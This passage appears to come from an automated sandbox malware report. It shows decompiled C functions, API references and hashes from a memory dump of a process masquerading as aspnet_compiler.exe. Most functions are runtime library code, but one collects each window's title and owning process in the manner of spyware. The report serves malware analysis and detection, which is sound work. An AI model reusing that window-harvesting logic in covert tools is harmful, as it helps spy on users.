                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 0044F266
                • _free.LIBCMT ref: 0044F278
                • _free.LIBCMT ref: 0044F28A
                • _free.LIBCMT ref: 0044F29C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                • Instruction ID: f954284d0b45cb36624272f64f50ef8c725a3c78d63bb55929d804f861096251
                • Opcode Fuzzy Hash: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                • Instruction Fuzzy Hash: A3F09676504601EBEA30EB69F983C4B73D9BA05B54354487BF048D7641C7B9FC844AAC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442968 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00442968(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46f9a0; // 0x140a318
					if(_t7 != 0x46f780) {
						E00445002(_t7);
						 *0x46f9a0 = 0x46f780;
					}
				}
				E00445002( *0x470a18);
				 *0x470a18 = 0;
				E00445002( *0x470a1c);
				 *0x470a1c = 0;
				E00445002( *0x470a48);
				 *0x470a48 = 0;
				E00445002( *0x470a4c);
				 *0x470a4c = 0;
				return 1;
			}




                0x00442971
                0x00442975
                0x00442977
                0x00442983
                0x00442986
                0x0044298c
                0x0044298c
                0x00442983
                0x00442998
                0x004429a5
                0x004429ab
                0x004429b6
                0x004429bc
                0x004429c7
                0x004429cd
                0x004429d5
                0x004429de

                APIs
                • _free.LIBCMT ref: 00442986
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 00442998
                • _free.LIBCMT ref: 004429AB
                • _free.LIBCMT ref: 004429BC
                • _free.LIBCMT ref: 004429CD
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                • Instruction ID: ac8127230bc54366d86f294ef586a91d245084804c15bedb181f71e342f475e2
                • Opcode Fuzzy Hash: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                • Instruction Fuzzy Hash: 30F0D0B9902721DBDB51AF19FC428093760A724B24781913BF45C56B71D77909858FCE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044CF69 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E0044CF69(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00441F9E(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00440303(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043A5E8();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E004443F4(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00440303(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0044D338(_a12, __eflags, _t213);
													E00445002(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00440303(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043A5E8();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46f00c; // 0xd60a1515
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00454B80(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00435760(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0043F8D0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044CF51);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E004338BB(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00445002(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00454B40( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0044D313( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0043EEAD();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043A5BB();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                0x0044cf6e
                0x0044cf71
                0x0044cf77
                0x0044cf8f
                0x0044cf92
                0x0044cf96
                0x0044cf98
                0x0044cf9a
                0x0044cf9c
                0x0044cf9f
                0x0044cfa2
                0x0044cfa5
                0x0044cfa7
                0x0044cfff
                0x0044cfff
                0x0044d005
                0x0044d007
                0x0044d012
                0x0044d016
                0x0044d018
                0x0044d01b
                0x0044d01f
                0x0044d01f
                0x0044d021
                0x0044d023
                0x0044d025
                0x0044d027
                0x0044d027
                0x0044d029
                0x0044d02c
                0x0044d02f
                0x0044d02f
                0x0044d031
                0x0044d032
                0x0044d032
                0x0044d03d
                0x0044d03f
                0x0044d042
                0x0044d043
                0x0044d046
                0x0044d046
                0x0044d04a
                0x0044d04d
                0x0044d050
                0x0044d050
                0x0044d05e
                0x0044d060
                0x0044d063
                0x0044d065
                0x0044d06f
                0x0044d072
                0x0044d075
                0x0044d077
                0x0044d07a
                0x0044d07c
                0x0044d0cc
                0x0044d0cf
                0x0044d0cf
                0x0044d0d1
                0x00000000
                0x0044d07e
                0x0044d080
                0x0044d080
                0x0044d082
                0x0044d085
                0x0044d085
                0x0044d08a
                0x0044d08d
                0x0044d08d
                0x0044d08f
                0x0044d090
                0x0044d090
                0x0044d094
                0x0044d097
                0x0044d097
                0x0044d09a
                0x0044d09d
                0x0044d0aa
                0x0044d0af
                0x0044d0b2
                0x0044d0b4
                0x0044d0ee
                0x0044d0ef
                0x0044d0f0
                0x0044d0f1
                0x0044d0f2
                0x0044d0f3
                0x0044d0f8
                0x0044d0fc
                0x0044d0fe
                0x0044d0ff
                0x0044d102
                0x0044d102
                0x0044d105
                0x0044d105
                0x0044d107
                0x0044d108
                0x0044d108
                0x0044d111
                0x0044d112
                0x0044d115
                0x0044d118
                0x0044d11b
                0x0044d11d
                0x0044d124
                0x0044d126
                0x0044d129
                0x0044d133
                0x0044d136
                0x0044d137
                0x0044d139
                0x0044d14d
                0x0044d14d
                0x0044d150
                0x0044d15a
                0x0044d15f
                0x0044d162
                0x0044d164
                0x00000000
                0x0044d166
                0x0044d16a
                0x0044d173
                0x0044d179
                0x00000000
                0x0044d17c
                0x0044d13b
                0x0044d13b
                0x0044d141
                0x0044d146
                0x0044d149
                0x0044d14b
                0x0044d182
                0x0044d184
                0x0044d185
                0x0044d186
                0x0044d187
                0x0044d188
                0x0044d189
                0x0044d18e
                0x0044d191
                0x0044d192
                0x0044d194
                0x0044d19a
                0x0044d1a1
                0x0044d1a4
                0x0044d1a7
                0x0044d1a8
                0x0044d1ab
                0x0044d1ac
                0x0044d1af
                0x0044d1b0
                0x0044d1d1
                0x0044d1d1
                0x0044d1d3
                0x00000000
                0x00000000
                0x0044d1b8
                0x0044d1ba
                0x0044d1bc
                0x0044d1be
                0x0044d1c0
                0x0044d1c2
                0x0044d1c4
                0x0044d1cf
                0x00000000
                0x0044d1cf
                0x0044d1c4
                0x0044d1c0
                0x00000000
                0x0044d1bc
                0x0044d1d5
                0x0044d1d7
                0x0044d1da
                0x0044d1f3
                0x0044d1f3
                0x0044d1f5
                0x0044d1f8
                0x0044d208
                0x0044d20a
                0x0044d20a
                0x0044d1fa
                0x0044d1fa
                0x0044d1fd
                0x00000000
                0x0044d1ff
                0x0044d1ff
                0x0044d202
                0x00000000
                0x0044d204
                0x0044d204
                0x0044d204
                0x0044d202
                0x0044d1fd
                0x0044d218
                0x0044d21c
                0x0044d22a
                0x0044d22f
                0x0044d244
                0x0044d246
                0x0044d24c
                0x0044d24f
                0x0044d281
                0x0044d281
                0x0044d286
                0x0044d28c
                0x0044d28c
                0x0044d293
                0x0044d2ad
                0x0044d2ad
                0x0044d2ae
                0x0044d2b4
                0x0044d2ba
                0x0044d2bb
                0x0044d2bc
                0x0044d2c1
                0x0044d2c4
                0x0044d2c6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044d295
                0x0044d295
                0x0044d29b
                0x0044d29d
                0x00000000
                0x0044d29f
                0x0044d29f
                0x0044d2a2
                0x00000000
                0x0044d2a4
                0x0044d2a4
                0x0044d2ab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044d2ab
                0x0044d2a2
                0x0044d29d
                0x00000000
                0x0044d2c8
                0x0044d2d0
                0x0044d2d6
                0x0044d2d8
                0x0044d2d8
                0x0044d2e0
                0x0044d2e5
                0x0044d2ed
                0x0044d2f0
                0x0044d2f2
                0x0044d306
                0x0044d30b
                0x0044d251
                0x0044d251
                0x0044d252
                0x0044d253
                0x0044d254
                0x0044d255
                0x0044d25d
                0x0044d25d
                0x0044d25d
                0x0044d25f
                0x0044d262
                0x0044d265
                0x0044d265
                0x0044d1dc
                0x0044d1df
                0x0044d1e1
                0x00000000
                0x0044d1e3
                0x0044d1e3
                0x0044d1e6
                0x0044d1e7
                0x0044d1e8
                0x0044d1e9
                0x0044d1ee
                0x0044d1e1
                0x0044d26d
                0x0044d272
                0x0044d27d
                0x00000000
                0x00000000
                0x00000000
                0x0044d14b
                0x0044d11f
                0x0044d121
                0x0044d17d
                0x0044d181
                0x0044d181
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044d0b6
                0x0044d0b9
                0x0044d0bc
                0x0044d0bf
                0x0044d0c2
                0x0044d0c5
                0x0044d0c8
                0x0044d0c8
                0x00000000
                0x0044d085
                0x0044d067
                0x0044d067
                0x0044d0d3
                0x0044d0d5
                0x00000000
                0x0044d0da
                0x0044cfa9
                0x0044cfa9
                0x0044cfac
                0x0044cfb5
                0x0044cfb8
                0x0044cfbf
                0x0044cfc1
                0x0044cfda
                0x0044cfdb
                0x0044cfdc
                0x0044cfde
                0x0044cfe3
                0x0044cfc3
                0x0044cfc3
                0x0044cfc6
                0x0044cfc7
                0x0044cfc9
                0x0044cfcb
                0x0044cfcd
                0x0044cfd2
                0x0044cfd2
                0x0044cfe6
                0x0044cfe8
                0x0044cfea
                0x00000000
                0x00000000
                0x0044cff0
                0x0044cff3
                0x0044cff5
                0x0044cff7
                0x00000000
                0x0044cff9
                0x0044cff9
                0x0044cffc
                0x00000000
                0x0044cffc
                0x00000000
                0x0044cff7
                0x0044d0db
                0x0044d0de
                0x0044d0e3
                0x00000000
                0x0044d0e6
                0x0044cf79
                0x0044cf79
                0x0044cf80
                0x0044cf81
                0x0044cf83
                0x0044cf88
                0x0044d0e7
                0x0044d0eb
                0x0044d0eb
                0x00000000

                APIs
                • _strpbrk.LIBCMT ref: 0044CFB8
                • _free.LIBCMT ref: 0044D0D5
                  • Part of subcall function 0043A5E8: IsProcessorFeaturePresent.KERNEL32(00000017,0043A5BA,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000), ref: 0043A5EA
                  • Part of subcall function 0043A5E8: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 0043A60C
                  • Part of subcall function 0043A5E8: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 0043A613
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                • String ID: *?$.
                • API String ID: 2812119850-3972193922
                • Opcode ID: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                • Instruction ID: 0665d5b14a1e4b9cb67c1a99571701ed5e9b0677a739cf7a3229819190da0774
                • Opcode Fuzzy Hash: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                • Instruction Fuzzy Hash: 88518271E00109AFEF14DFA9C881AAEF7B5EF48318F24416FE854E7341D6799E068B54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004165EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132threadwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E004165EC(void* __edi, struct HWND__* _a4) {
				short _v604;
				char _v632;
				void* _v636;
				char _v656;
				void* _v660;
				char _v680;
				void* _v684;
				char _v704;
				void* _v708;
				char _v728;
				void* _v732;
				char _v752;
				void* _v756;
				char _v776;
				void* _v780;
				char _v800;
				void* _v804;
				char _v824;
				void* _v828;
				char _v848;
				void* _v852;
				char _v872;
				void* _v876;
				char _v896;
				void* _v900;
				char _v920;
				void* _v924;
				char _v940;
				char _v944;
				void* _v948;
				char _v964;
				char _v968;
				void* _v972;
				char _v988;
				long _v992;
				intOrPtr _v996;
				void* __ebx;
				void* __ebp;
				int _t50;
				void* _t54;
				void* _t56;
				signed int _t87;
				struct HWND__* _t149;
				void* _t152;

				_t147 = __edi;
				_push(_t87);
				_t149 = _a4;
				GetWindowThreadProcessId(_t149,  &_v992);
				E0041A6E9(_t87,  &_v940, _t149);
				E0041A6E9(_t87,  &_v964, _v992);
				GetWindowTextW(_t149,  &_v604, 0x12c);
				_t50 = IsWindowVisible(_t149);
				_t156 = _t50;
				_t88 = _t87 & 0xffffff00 | _t50 != 0x00000000;
				E0040415E(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v988, _v992, _t152,  &_v604);
				_t54 = E0041A879(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v656, E0041AB76( &_v632, _v996));
				_t56 = E0041A879(_t88,  &_v680,  &_v992);
				L00403356(E00408832(_t88,  &_v920, E00402E81( &_v896, E00408832(_t88,  &_v872, E00402EF0(_t88,  &_v848, E00408832(_t88,  &_v824, E00402E81( &_v800, E00408832(_t88,  &_v776, E00402EF0(_t88,  &_v752, E00408832(_t88,  &_v728, E0041A6E9(_t88,  &_v704, _t88 & 0x000000ff), __edi, _t152, _t50, 0x46a788), _t152, _t156,  &_v944), __edi, _t152, _t156, 0x46a788), _t56), __edi, _t152, _t156, 0x46a788), _t152, _t156,  &_v968), _t147, _t152, _t156, 0x46a788), _t54), _t147, _t152, _t156, 0x46a630));
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401EE9();
				E00401EE9();
				E00401FB8();
				E00401FB8();
				return 1;
			}















































                0x004165ec
                0x004165f8
                0x004165fa
                0x00416603
                0x0041660f
                0x0041661c
                0x0041662f
                0x00416636
                0x0041663c
                0x0041664a
                0x0041664d
                0x00416670
                0x0041668d
                0x00416730
                0x00416739
                0x00416742
                0x0041674e
                0x0041675a
                0x00416766
                0x00416772
                0x0041677e
                0x0041678a
                0x00416796
                0x004167a2
                0x004167ae
                0x004167ba
                0x004167c6
                0x004167cf
                0x004167d8
                0x004167e1
                0x004167ee

                APIs
                • GetWindowThreadProcessId.USER32(?,?), ref: 00416603
                • GetWindowTextW.USER32 ref: 0041662F
                • IsWindowVisible.USER32(?), ref: 00416636
                  • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Window$Process$OpenTextThreadVisible
                • String ID: h5G
                • API String ID: 478698014-4077671695
                • Opcode ID: c734f3f8915459a3965ae4185bfcd322c1eaa7ffedfc91832255b2e5e7fdfc75
                • Instruction ID: 99c6d8f7261b3cee98e9cdba014bcc0a4643868b1acb47591d6874b1b0f6d138
                • Opcode Fuzzy Hash: c734f3f8915459a3965ae4185bfcd322c1eaa7ffedfc91832255b2e5e7fdfc75
                • Instruction Fuzzy Hash: E241E4311082419BC324FB65D891DDFF3E9AFD4354F50893EF48A921E1EF349A4ACA5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00441D05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E00441D05(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0044D8D9(_t52);
					GetModuleFileNameA(0, 0x4703d8, 0x104);
					_t49 =  *0x470a50; // 0x13f3458
					 *0x470a58 = 0x4703d8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x4703d8;
					}
					_v8 = 0;
					_v16 = 0;
					E00441E29(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00441F9E(_v8, _v16, 1);
					if(_t64 != 0) {
						E00441E29(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0044D3F4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x470a44 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x470a48 = _t59;
									L16:
									E00445002(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x470a44 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x470a48 = _t43;
						goto L10;
					} else {
						_t44 = E0043EEAD();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00445002(_t64);
						return _t50;
					}
				} else {
					_t45 = E0043EEAD();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0043A5BB();
					return _t65;
				}
			}





















                0x00441d05
                0x00441d12
                0x00441d32
                0x00441d45
                0x00441d4b
                0x00441d51
                0x00441d59
                0x00441d60
                0x00441d60
                0x00441d65
                0x00441d6c
                0x00441d73
                0x00441d85
                0x00441d8c
                0x00441dab
                0x00441db7
                0x00441dd2
                0x00441dd5
                0x00441ddc
                0x00441de2
                0x00441de9
                0x00441dec
                0x00441dee
                0x00441df2
                0x00441dfc
                0x00441dfc
                0x00441dfe
                0x00441e04
                0x00441e07
                0x00441e09
                0x00441e0f
                0x00441e10
                0x00441e16
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00441df4
                0x00441df4
                0x00441df4
                0x00441df7
                0x00441df8
                0x00000000
                0x00441df4
                0x00441de4
                0x00000000
                0x00441de4
                0x00441dbd
                0x00441dc2
                0x00441dc4
                0x00441dc6
                0x00000000
                0x00441d8e
                0x00441d8e
                0x00441d93
                0x00441d95
                0x00441d96
                0x00441dcb
                0x00441dcb
                0x00441e19
                0x00441e1a
                0x00000000
                0x00441e23
                0x00441d1a
                0x00441d1a
                0x00441d21
                0x00441d22
                0x00441d24
                0x00000000
                0x00441d29

                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00441D45
                • _free.LIBCMT ref: 00441E10
                • _free.LIBCMT ref: 00441E1A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$FileModuleName
